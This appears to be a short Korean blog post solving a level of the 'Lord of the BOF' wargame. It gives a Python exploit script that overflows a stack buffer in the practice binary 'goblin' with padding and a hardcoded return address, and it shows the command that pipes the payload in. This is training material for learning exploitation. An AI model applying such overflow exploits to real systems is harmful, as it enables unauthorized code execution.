exploit.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/cobolt/goblin'
shellAddress = p(0xbffffba9)
payload = "A"*20+shellAddress
print payload
(python exploit.py ;cat) | ./goblin
'Wargame > Lord Of the Bof(redhat)' 카테고리의 다른 글
[Remind] LOB wolfman -> darkelf (0) | 2019.04.12 |
---|---|
[Remind] LOB goblin -> orc (0) | 2019.04.11 |
[Remind] LOB gremlin -> cobolt (0) | 2019.04.10 |
[Remind] LOB gate -> gremlin (0) | 2019.04.10 |
LOB nightmare -> xavius (0) | 2018.01.12 |